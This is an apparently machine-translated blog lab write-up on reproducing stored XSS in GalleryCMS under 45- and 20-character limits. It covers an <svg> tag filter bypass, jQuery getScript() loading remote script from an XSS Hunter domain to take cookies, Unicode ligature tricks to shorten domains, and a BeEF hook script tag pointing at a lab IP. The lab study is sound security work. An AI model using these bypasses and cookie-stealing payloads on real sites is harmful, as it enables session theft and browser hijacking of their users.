当前位置:网站首页>XSS holes emersion
XSS holes emersion
2022-08-03 21:11:00 【hug kitten】
目录
XSS复现GalleryCMSCharacter length limit short domain name bypass
第一步:First upload a string at will,See where the string was last entered
第二步:Let's test it again to see if it worksJS代码
第四步:beef复现GalleryCMS20character limit short domain name bypass
XSS复现GalleryCMSCharacter length limit short domain name bypass
We build it firstgalleryCMS的服务器.
第一步:First upload a string at will,See where the string was last entered
The data we uploaded can be seen in the database
第二步:Let's test it again to see if it worksJS代码
displayed in the database as,这说明对JS代码有限制,As a result, we can't make the pop-up window
我们查看一下源码,It can be seen that he did length to us45,And filter a lot of tags and other restrictions
But it can be seen from the source code that there is nothing right<svg>标签进行限制,所以我们尝试使用<svg>Whether the label test can be bypassed
绕过成功:
第三步:使用getScript()函数绕过
We found through this page that the web page is using jQuery框架,我们尝试使用getScript()Try bypassing the function.
getScript()函数:使用 AJAX 的 HTTP GET 请求获取和执行 JavaScript.
语法:(selector).getScript(url,success(response,status))
| 参数 | 描述 |
|---|---|
| url | 必需.规定将请求发送到哪个 URL. |
| success(response,status) | 可选.规定当请求成功时运行的函数. 额外的参数:
|
我们尝试将<svg>标签和getScriptGet it togethercookie值
我们使用了xss-hunterA page allocated to the system,telsm.xss.htThere are many functions for obtaining information,Requires registration and has a custom onexss.htOnly subdomains can be used,But I didn't register the domain name,So I can't see the obtained message,But it also means success.
第四步:beef复现GalleryCMS20character limit short domain name bypass
We changed the maximum character limit length to 20个字符,利用beeftools try to bypass
But the basic commands will be over20个字符
由于字符长度限制,How to achieve bypass?
1、使用Unicode编码进行编码,UnicodeThe encoding has several special characters,如tel在UnicodeOnly one character is counted in
2、域名重定向-->Domestic domain name redirection requires filing,Only foreign domain names can be used
We use the first methodUnicodeThe encoding is bypassed with special characters
- ℠ expands to
sm - ㏛ expands to
sr - st expands to
st - ㎭ expands to
rad - ℡ expands to
tel
我们先打开beef-xss:
登陆beef的网页端,beef的用户名和密码在/etc/beef-xss/config.yml文件下查看
把hook.jsThe contents of the file are copied to the server/var/www/html/index.html文件下,Because I don't have my own domain name,So I can modify the configuration file by myself,使用ip进行测试<script src="//192.168.112.131:3000/hoot.js">
成功了
参考资料:
边栏推荐
猜你喜欢
Li Mu hands-on learning deep learning V2-BERT fine-tuning and code implementation
Advantages and Disadvantages of Blind and Buried Via PCB Stacked Via Design
为什么 BI 软件都搞不定关联分析
Several difficult problems in DDD
AWTK开发编译环境踩坑记录1(编译提示powershell.exe出错)
【使用 Pytorch 实现入门级的人工神经网络】
Often forget HiFlow 】 【 check-in?Use tencent cloud scenario connector to remind you every day.
2022年强网杯rcefile wp
ECCV 2022 | 清华&腾讯AI Lab提出REALY:重新思考3D人脸重建的评估方法
《富爸爸,穷爸爸》思维导图和学习笔记
随机推荐
力扣203-移除链表元素——链表
XSS线上靶场---Warmups
Leetcode 16. Numerical integral power (power + fast recursive/iteration)
迪赛智慧数——柱状图(多色柱状图):2021年我国城市住户存款排名
Often forget HiFlow 】 【 check-in?Use tencent cloud scenario connector to remind you every day.
leetcode 231. Powers of 2
leetcode 136. 只出现一次的数字(异或!!)
leetcode 231. 2 的幂
ES、Kibana 8.0安装
力扣59-螺旋矩阵 II——边界判断
leetcode 072. 求平方根
小朋友学C语言(3):整数、浮点数、字符
TweenMax.js向日葵表情变化
ES6--剩余参数
业界新标杆!阿里开源自研高并发编程核心笔记(2022 最新版)
15年软件架构师经验总结:在ML领域,初学者踩过的五个坑
svg胶囊药样式切换按钮
Leetcode sword refers to Offer 15. 1 in the binary number
Li Mu hands-on learning deep learning V2-BERT fine-tuning and code implementation
leetcode 1837. The sum of the digits in the K-base representation